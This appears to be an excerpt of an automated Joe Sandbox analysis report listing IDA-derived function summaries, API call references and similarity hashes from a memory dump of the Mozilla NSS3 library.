                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                                                          • Opcode ID: d3872a12b5541e6eb9050e2768900c4ee2ee367e67592a910cf3806b4ac4d78c
                                                                                                                                                                                                                          • Instruction ID: 289875c5c39dfbca6e357bfb23965bd9553f6e8b20e59c6a2f7255d130917c5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3872a12b5541e6eb9050e2768900c4ee2ee367e67592a910cf3806b4ac4d78c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B61E5B1E192158FDB04CF66D800FEEB7B2AF85308F184169D855ABF59E7319C06CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C4D7313), ref: 6C4D8FBB
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D9012
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D903C
                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D909E
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90DB
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90F1
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D906B
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C4D7313), ref: 6C4D9128
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3590961175-0
                                                                                                                                                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                          • Instruction ID: afab832b605e15187ad5d9e4e1d774c4a4a844141734022c53b201dfc6784d51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF518F71A002028BFB10EF6ADC64F2AB3F9AF54359F164129D915D7B61EB32F805CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C488850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                            • Part of subcall function 6C488850: PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                            • Part of subcall function 6C488850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C489CAD
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C489CE8
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D01
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D38
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C48ECEC,6C492FCD,00000000,?,6C492FCD,?), ref: 6C489D4D
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C489D70
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C489DC3
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C489DDD
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488906
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: EnterCriticalSection.KERNEL32(?), ref: 6C48891A
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C48894A
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: calloc.MOZGLUE(00000001,6C49072D,00000000,00000000,00000000,?,6C490725,00000000,00000058), ref: 6C488959
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C488993
                                                                                                                                                                                                                            • Part of subcall function 6C4888D0: PR_Unlock.NSS3(?), ref: 6C4889AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3394263606-0
                                                                                                                                                                                                                          • Opcode ID: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                          • Instruction ID: fbdaa9dc08f2a42e21db6212135c4e6454806ce17cf23ab395012322e5b06832
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51556b306c9cfb1592132b2c97adb98e2d672a3852492fd2c1e57750c2a9fa91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85515EB0A06B058FDB00EF68C484E5ABBF0BF54359F15852DD8989BB10EB31E884CBD5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589EC0
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589EF9
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C589F73
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589FA5
                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C589FCF
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C589FF2
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A01D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1904992153-0
                                                                                                                                                                                                                          • Opcode ID: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                          • Instruction ID: 9387f445e063be9b56ddade04ef2548801ece252d37e5cc4fe75a0396a33995e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45b8d8a35fa4420bdea1defad4ac42646f9b35ffbf93b8fcce8d1b3ebcaaea86
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00519EB2801621CBCB109F25DC8064AB7B4BF84319F15856AD8595BB52EB31FC89CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C47DCFA
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C47DD40
                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C47DD62
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD71
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47DD81
                                                                                                                                                                                                                          • CERT_RemoveCertListNode.NSS3(?), ref: 6C47DD8F
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
                                                                                                                                                                                                                            • Part of subcall function 6C4906A0: PR_Unlock.NSS3 ref: 6C4906EB
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DD9E
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C47DDB7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 653623313-0
                                                                                                                                                                                                                          • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                          • Instruction ID: 951e07abbb6edc24c6003d1ad8f3015c9ea29b90f8e48e027300086499736b0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218CB6E011259BEF21DEA4DD40DDEBBB4AF05219B190024E818A7701F722ED158BF2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F72
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED8F
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46ED9E
                                                                                                                                                                                                                            • Part of subcall function 6C46ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C46EDA4
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505F8F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FCC
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FD3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FF4
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505FFB
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506019
                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C50AADB,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506036
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection$DestroyMonitor$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 227462623-0
                                                                                                                                                                                                                          • Opcode ID: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                          • Instruction ID: 77c2f00d9a5bd523010c8d507d744ad8f6534092b70bc552a68148168edacf50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f83e505bea8e8846bbdb8aca8d1c25ac517a7064b6d84c380f03ce62049486f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 392127F1604B019BEA10DF75DC48BD777E8AB41748F10082CE46AC7640EB36F118CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LogFlush.NSS3(00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58086C
                                                                                                                                                                                                                            • Part of subcall function 6C580930: EnterCriticalSection.KERNEL32(?,00000000,?,6C580C83), ref: 6C58094F
                                                                                                                                                                                                                            • Part of subcall function 6C580930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C580C83), ref: 6C580974
                                                                                                                                                                                                                            • Part of subcall function 6C580930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C580983
                                                                                                                                                                                                                            • Part of subcall function 6C580930: _PR_MD_UNLOCK.NSS3(?,?,6C580C83), ref: 6C58099F
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58087D
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C580892
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C58798A), ref: 6C5808AA
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808C7
                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808E9
                                                                                                                                                                                                                          • free.MOZGLUE(?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C5808EF
                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C587AE2,?,?,?,?,?,?,6C58798A), ref: 6C58090E
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
• String ID:
• API String ID: 3145526462-0
• Opcode ID: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
• Instruction ID: df9ea1bc3f69ee230b87d0edceb9c08c6d1960b21ffcf948cfd7bf5c245d679b
• Opcode Fuzzy Hash: 369b97973a35bef26799b70b4e954bbfde27a7f3bc19dbf12e86c7441e9cb40d
• Instruction Fuzzy Hash: FF1181B1B033504BFB00AB54DC5574B3778AB81368F1E0125E41547A40DB31F945CBDE
APIs
• TlsGetValue.KERNEL32(?,?,?,?,6C4E460B,?,?), ref: 6C473CA9
• EnterCriticalSection.KERNEL32(?), ref: 6C473CB9
• PL_HashTableLookup.NSS3(?), ref: 6C473CC9
• SECITEM_DupItem_Util.NSS3(00000000), ref: 6C473CD6
• PR_Unlock.NSS3 ref: 6C473CE6
• CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C473CF6
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C473D03
• PR_Unlock.NSS3 ref: 6C473D15
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
Similarity
• API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
• String ID:
• API String ID: 1376842649-0
• Opcode ID: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
• Instruction ID: dec37ac7a78f4657409fe128189a0dd0f2ec1b51f5bae679914ffa708447dd8e
• Opcode Fuzzy Hash: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
• Instruction Fuzzy Hash: D6112C7AE41514A7EB11A724EC05DE67A38EB0225DF160134ED1843B11F722ED58C7E5
APIs
• DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B862
• free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B869
• DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B88A
• free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B891
• DeleteCriticalSection.KERNEL32(6C58798A), ref: 6C58B8B9
• free.MOZGLUE(?), ref: 6C58B8C0
• DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E1
• free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E8
Similarity
• API ID: CriticalDeleteSectionfree
• String ID:
• API String ID: 2988086103-0
• Opcode ID: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
• Instruction ID: 412f42208b9467f626ac00b7c5358d745b5cfe88545c31a079185b238a5da65b
• Opcode Fuzzy Hash: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
• Instruction Fuzzy Hash: 411100B2A02B209BDF10EFA0DC0C74A3778BB0A754F464118E51657A40D335BA4ACBDD
APIs
  • Part of subcall function 6C4911C0: PR_NewLock.NSS3 ref: 6C491216
• free.MOZGLUE(?), ref: 6C479E17
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E25
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E4E
• TlsGetValue.KERNEL32 ref: 6C479EA2
  • Part of subcall function 6C489500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C489546
• EnterCriticalSection.KERNEL32(?), ref: 6C479EB6
• PR_Unlock.NSS3 ref: 6C479ED9
• PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C479F18
Similarity
• API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
• String ID:
• API String ID: 3381623595-0
• Opcode ID: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
• Instruction ID: d39485737f38312b1e3675c72573b52997b12688e31101f88bb073e1cf0e9f68
• Opcode Fuzzy Hash: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
• Instruction Fuzzy Hash: 1781D3B5A01601ABEB20DF34DC40EEB77A9BF65249F14452CE84987B41FB32E918C7E1
APIs
